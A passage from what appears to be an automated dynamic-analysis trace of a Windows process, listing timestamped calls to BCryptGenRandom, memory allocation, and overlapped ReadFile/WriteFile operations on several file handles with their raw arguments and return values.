[0091.881] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0091.881] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0091.885] calloc (_Count=0x40, _Size=0x4) returned 0x2071008 [0091.886] calloc (_Count=0x41, _Size=0x4) returned 0x2071110 [0091.886] free (_Block=0x2071008) [0091.886] calloc (_Count=0x41, _Size=0x4) returned 0x2071220 [0091.886] calloc (_Count=0x82, _Size=0x4) returned 0x2071330 [0091.886] free (_Block=0x2071220) [0091.886] free (_Block=0x2071330) [0091.886] free (_Block=0x2071110) [0091.886] WriteFile (in: hFile=0x119c, lpBuffer=0x3df015c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0128 | out: lpBuffer=0x3df015c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0128) returned 1 [0091.887] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0092.176] CloseHandle (hObject=0x11a0) returned 1 [0092.176] free (_Block=0x1ff1e60) [0092.176] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0092.177] CloseHandle (hObject=0x1194) returned 1 [0092.177] free (_Block=0x3d70048) [0092.177] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0092.178] WriteFile (in: hFile=0x13d8, lpBuffer=0x3db00ec*, nNumberOfBytesToWrite=0x13b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8) returned 1 [0092.178] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0092.304] ReadFile (in: hFile=0x13dc, lpBuffer=0x3df015c, nNumberOfBytesToRead=0xc2e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0128 | out: lpBuffer=0x3df015c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0128) returned 1 [0092.305] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0092.305] CloseHandle (hObject=0x13dc) returned 1 [0092.306] free (_Block=0x3df0128) [0092.306] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0092.355] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.357] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.358] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0092.358] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.361] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.361] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0092.361] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0092.361] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0092.361] free (_Block=0x77d800) [0092.361] calloc (_Count=0x41, _Size=0x4) returned 0x2071008 [0092.361] calloc (_Count=0x82, _Size=0x4) returned 0x2071118 [0092.362] free (_Block=0x2071008) [0092.362] free (_Block=0x2071118) [0092.362] free (_Block=0x77d908) [0092.362] WriteFile (in: hFile=0x13dc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0092.362] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0092.385] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.387] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.388] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0092.388] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.390] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.390] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0092.390] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0092.390] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0092.390] free (_Block=0x77d800) [0092.390] calloc (_Count=0x41, _Size=0x4) returned 0x2071008 [0092.391] calloc (_Count=0x82, _Size=0x4) returned 0x2071118 [0092.391] free (_Block=0x2071008) [0092.391] free (_Block=0x2071118) [0092.391] free (_Block=0x77d908) [0092.391] WriteFile (in: hFile=0x13d8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0092.392] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0092.397] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.400] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.400] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0092.400] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.402] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.402] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0092.522] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0092.522] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0092.522] free (_Block=0x77d800) [0092.522] calloc (_Count=0x41, _Size=0x4) returned 0x2071008 [0092.522] calloc (_Count=0x82, _Size=0x4) returned 0x2071118 [0092.522] free (_Block=0x2071008) [0092.522] free (_Block=0x2071118) [0092.523] free (_Block=0x77d908) [0092.523] WriteFile (in: hFile=0x1194, lpBuffer=0x3d7007c, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 0x0 [0092.525] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0092.551] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.555] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.556] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0092.556] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.561] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.561] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0092.561] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0092.561] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0092.561] free (_Block=0x77d800) [0092.561] calloc (_Count=0x41, _Size=0x4) returned 0x2071008 [0092.561] calloc (_Count=0x82, _Size=0x4) returned 0x2071118 [0092.562] free (_Block=0x2071008) [0092.562] free (_Block=0x2071118) [0092.562] free (_Block=0x77d908) [0092.562] WriteFile (in: hFile=0x13dc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0092.562] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0092.587] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.589] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.589] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0092.589] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.592] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.592] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0092.592] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0092.593] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0092.593] free (_Block=0x77d800) [0092.593] calloc (_Count=0x41, _Size=0x4) returned 0x2071008 [0092.593] calloc (_Count=0x82, _Size=0x4) returned 0x2071118 [0092.593] free (_Block=0x2071008) [0092.593] free (_Block=0x2071118) [0092.593] free (_Block=0x77d908) [0092.593] WriteFile (in: hFile=0x1194, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0092.594] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0092.601] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.604] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.604] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0092.604] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.607] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.607] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0092.610] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0092.611] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0092.611] free (_Block=0x77d800) [0092.611] calloc (_Count=0x41, _Size=0x4) returned 0x2071008 [0092.611] calloc (_Count=0x82, _Size=0x4) returned 0x2071118 [0092.611] free (_Block=0x2071008) [0092.611] free (_Block=0x2071118) [0092.611] free (_Block=0x77d908) [0092.611] WriteFile (in: hFile=0x11a0, lpBuffer=0x3db00ec*, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8) returned 1 [0092.612] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0092.680] CloseHandle (hObject=0x11a0) returned 1 [0092.680] free (_Block=0x3db00b8) [0092.685] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0092.687] WriteFile (in: hFile=0x13d8, lpBuffer=0x3df015c*, nNumberOfBytesToWrite=0x1fc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0128 | out: lpBuffer=0x3df015c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0128) returned 1 [0092.687] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0092.689] WriteFile (in: hFile=0x13dc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x20e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0092.689] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0092.877] ReadFile (in: hFile=0x13dc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x3c2, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0092.878] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0092.907] ReadFile (in: hFile=0x13d8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2cc, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0092.907] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0092.947] CloseHandle (hObject=0x13d8) returned 1 [0092.948] free (_Block=0x3df0008) [0092.948] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0092.954] WriteFile (in: hFile=0x11a0, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0092.955] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0093.009] ReadFile (in: hFile=0x13dc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x11276, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0093.011] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0093.045] ReadFile (in: hFile=0x13dc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x3126b, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0093.048] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0093.078] ReadFile (in: hFile=0x13dc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0093.079] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0093.079] CloseHandle (hObject=0x13dc) returned 1 [0093.088] free (_Block=0x1ff1e60) [0093.088] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0093.111] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0093.113] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0093.114] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0093.114] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0093.116] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0093.116] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0093.116] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0093.116] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0093.117] free (_Block=0x77d800) [0093.117] calloc (_Count=0x41, _Size=0x4) returned 0x2071008 [0093.117] calloc (_Count=0x82, _Size=0x4) returned 0x2071118 [0093.117] free (_Block=0x2071008) [0093.117] free (_Block=0x2071118) [0093.117] free (_Block=0x77d908) [0093.117] WriteFile (in: hFile=0x13dc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0093.118] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0093.121] WriteFile (in: hFile=0x13dc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0093.122] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0093.178] ReadFile (in: hFile=0x13dc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x7254, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0093.179] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0093.180] CloseHandle (hObject=0x13dc) returned 1 [0093.180] free (_Block=0x1ff1e60) [0093.180] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0093.228] ReadFile (in: hFile=0x11a0, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x7254, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0093.255] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0093.279] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0093.282] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0093.282] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0093.282] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0093.285] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0093.285] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0093.285] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0093.285] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0093.285] free (_Block=0x77d800) [0093.285] calloc (_Count=0x41, _Size=0x4) returned 0x2071008 [0093.285] calloc (_Count=0x82, _Size=0x4) returned 0x2071118 [0093.286] free (_Block=0x2071008) [0093.286] free (_Block=0x2071118) [0093.286] free (_Block=0x77d908) [0093.286] WriteFile (in: hFile=0x13d8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0093.286] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0093.312] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0093.315] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0093.315] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0093.315] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0093.318] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0093.318] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0093.321] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0093.321] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0093.321] free (_Block=0x77d800) [0093.321] calloc (_Count=0x41, _Size=0x4) returned 0x2071008 [0093.321] calloc (_Count=0x82, _Size=0x4) returned 0x2071118 [0093.322] free (_Block=0x2071008) [0093.322] free (_Block=0x2071118) [0093.322] free (_Block=0x77d908) [0093.322] WriteFile (in: hFile=0x1194, lpBuffer=0x3e300ac*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30078 | out: lpBuffer=0x3e300ac*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30078) returned 1 [0093.323] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0093.455] CloseHandle (hObject=0x13e0) returned 1 [0093.456] free (_Block=0x3e700e8) [0093.456] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0093.508] WriteFile (in: hFile=0x13d8, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x6590, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0093.509] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0093.511] WriteFile (in: hFile=0x13dc, lpBuffer=0x3eb018c*, nNumberOfBytesToWrite=0x321b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3eb0158 | out: lpBuffer=0x3eb018c*, lpNumberOfBytesWritten=0x0, 